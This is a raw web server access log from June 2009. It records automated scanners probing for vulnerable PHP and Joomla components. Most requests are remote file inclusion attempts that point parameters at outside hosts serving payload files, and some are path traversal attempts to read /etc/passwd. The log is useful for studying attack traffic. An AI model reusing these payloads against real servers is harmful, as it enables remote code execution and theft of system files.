216.75.60.116 - - [27/Jun/2009:10:09:58 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:10:10:12 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:10:10:12 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:10:10:12 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:10:10:54 -0500] "GET /logs/access_log.1241827200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:10:11:00 -0500] "GET /logs/access_log.1241827200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
123.125.64.38 - - [27/Jun/2009:10:13:09 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.107.138.34 - - [27/Jun/2009:10:15:19 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:15:19 -0500] "GET //skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:15:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:16:42 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:19:40 -0500] "GET //admin/classes/errors.php?error=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:19:45 -0500] "GET /logs//admin/classes/errors.php?error=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:19:45 -0500] "GET //admin/classes/errors.php?error=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:19:45 -0500] "GET /logs//admin/classes/errors.php?error=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:19:45 -0500] "GET /logs/access_log.1236643200//admin/classes/errors.php?error=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:19:49 -0500] "GET /logs/access_log.1236643200//admin/classes/errors.php?error=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:20:19 -0500] "GET /logs/access_log.1237075200//admin/classes/errors.php?error=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:10:22:47 -0500] "GET /logs/access_log.1228694400//accounts/inc/include.php?language=0&lang_settings[0][1]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:10:22:49 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:10:22:49 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:10:22:49 -0500] "GET /logs/access_log.1228694400//accounts/inc/include.php?language=0&lang_settings[0][1]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:10:22:49 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:10:22:49 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
216.17.99.13 - - [27/Jun/2009:10:23:11 -0500] "GET /logs/home.php?index=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:10:23:11 -0500] "GET /home.php?index=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 291 "-""libwww-perl/5.826"
123.143.98.5 - - [27/Jun/2009:10:23:42 -0500] "GET /home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:23:42 -0500] "GET /logs/home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:23:42 -0500] "GET /logs/access_log.1238025600/home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:23:44 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:23:44 -0500] "GET //skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:23:44 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:23:48 -0500] "GET /logs/access_log.1239667200/home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:24:31 -0500] "GET /logs/home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:24:31 -0500] "GET /logs/access_log.1238025600/home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:24:31 -0500] "GET /home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:24:37 -0500] "GET /logs/access_log.1239667200/home.php?index=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:25:29 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
82.136.20.14 - - [27/Jun/2009:10:28:25 -0500] "GET /logs/home.php?index=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
82.136.20.14 - - [27/Jun/2009:10:28:26 -0500] "GET /home.php?index=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
87.20.85.87 - - [27/Jun/2009:10:31:41 -0500] "GET /logs/errors.php?error=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:10:31:41 -0500] "GET /errors.php?error=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:10:31:41 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:10:31:50 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:10:36:30 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:10:36:30 -0500] "GET //modules/xfsection/modify.php?dir_module=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.826"
65.55.106.124 - - [27/Jun/2009:10:36:54 -0500] "GET /logs/access_log.1161561600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.193.216.69 - - [27/Jun/2009:10:37:09 -0500] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://aboutav.com//id1.txt????? HTTP/1.0" 404 332 "-""Mozilla/5.0"
62.193.216.69 - - [27/Jun/2009:10:37:09 -0500] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://aboutav.com//id1.txt????? HTTP/1.0" 404 337 "-""Mozilla/5.0"
62.193.216.69 - - [27/Jun/2009:10:37:09 -0500] "GET /logs/access_log.1240531200//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://aboutav.com//id1.txt????? HTTP/1.0" 404 359 "-""Mozilla/5.0"
65.55.106.107 - - [27/Jun/2009:10:37:26 -0500] "GET /logs/access_log.1126483200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
123.143.98.5 - - [27/Jun/2009:10:37:58 -0500] "GET //modules/xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:37:58 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:37:58 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.193.216.69 - - [27/Jun/2009:10:38:50 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt????? HTTP/1.0" 404 281 "-""Mozilla/5.0"
62.193.216.69 - - [27/Jun/2009:10:38:51 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt????? HTTP/1.0" 404 286 "-""Mozilla/5.0"
62.193.216.69 - - [27/Jun/2009:10:38:51 -0500] "GET /logs/access_log.1242000000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt????? HTTP/1.0" 404 308 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:38:53 -0500] "GET //modules/xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:38:53 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
123.143.98.5 - - [27/Jun/2009:10:38:53 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.193.216.69 - - [27/Jun/2009:10:38:56 -0500] "GET /logs/access_log.1241913600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt????? HTTP/1.0" 404 308 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:10:39:23 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:10:39:23 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:10:39:24 -0500] "GET /logs/access_log.1235865600/components/com_simpleboard/image_upload.php?sbp=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:10:40:30 -0500] "GET /logs/access_log.1239148800/components/com_simpleboard/image_upload.php?sbp=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:10:41:41 -0500] "GET /logs/access_log.1239667200/components/com_simpleboard/image_upload.php?sbp=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:42:29 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:42:29 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:42:29 -0500] "GET /logs/access_log.1236038400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:43:15 -0500] "GET /logs/access_log.1236124800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:10:45:22 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:10:45:22 -0500] "GET //modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:10:45:22 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:10:46:14 -0500] "GET /logs/access_log.1238025600//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:10:46:36 -0500] "GET /logs/access_log.1240444800/components/com_simpleboard/image_upload.php?sbp=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:10:48:53 -0500] "GET /?sourcedir=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:10:48:53 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:10:49:06 -0500] "GET /logs/?sourcedir=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:10:50:01 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:10:54:16 -0500] "GET /myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:10:54:17 -0500] "GET /logs/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:10:54:17 -0500] "GET /logs/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:10:54:17 -0500] "GET /myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:11:00:00 -0500] "GET /logs/config.php?DIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:11:00:00 -0500] "GET /config.php?DIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:11:01:06 -0500] "GET /logs/config.php?DIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:11:01:06 -0500] "GET /config.php?DIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.826"
87.20.85.87 - - [27/Jun/2009:11:03:14 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:11:03:14 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:11:03:14 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.55.106.185 - - [27/Jun/2009:11:05:24 -0500] "GET /logs/access_log.1185321600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.185 - - [27/Jun/2009:11:05:24 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.20.85.87 - - [27/Jun/2009:11:06:10 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:11:06:13 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:11:06:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
82.136.20.14 - - [27/Jun/2009:11:06:57 -0500] "GET /myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
82.136.20.14 - - [27/Jun/2009:11:06:58 -0500] "GET /logs/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
216.120.231.11 - - [27/Jun/2009:11:07:21 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
216.120.231.11 - - [27/Jun/2009:11:07:21 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.120.231.11 - - [27/Jun/2009:11:07:21 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.20.85.87 - - [27/Jun/2009:11:07:24 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.120.231.11 - - [27/Jun/2009:11:07:39 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:09:27 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:09:27 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:09:27 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:09:58 -0500] "GET /logs/access_log.1230854400//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:09:59 -0500] "GET /logs/access_log.1230768000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:08 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:08 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:13 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:14 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:14 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:14 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:39 -0500] "GET /logs/access_log.1230854400//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:39 -0500] "GET /logs/access_log.1230768000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:11:10:41 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:11:10:41 -0500] "GET /logs/access_log.1238112000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:11:10:41 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:43 -0500] "GET /logs/access_log.1230854400//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:10:43 -0500] "GET /logs/access_log.1230768000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:11:21 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:11:47 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:11:52 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:11:12:47 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:12:47 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:12:47 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:11:12:47 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:11:12:47 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id2.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
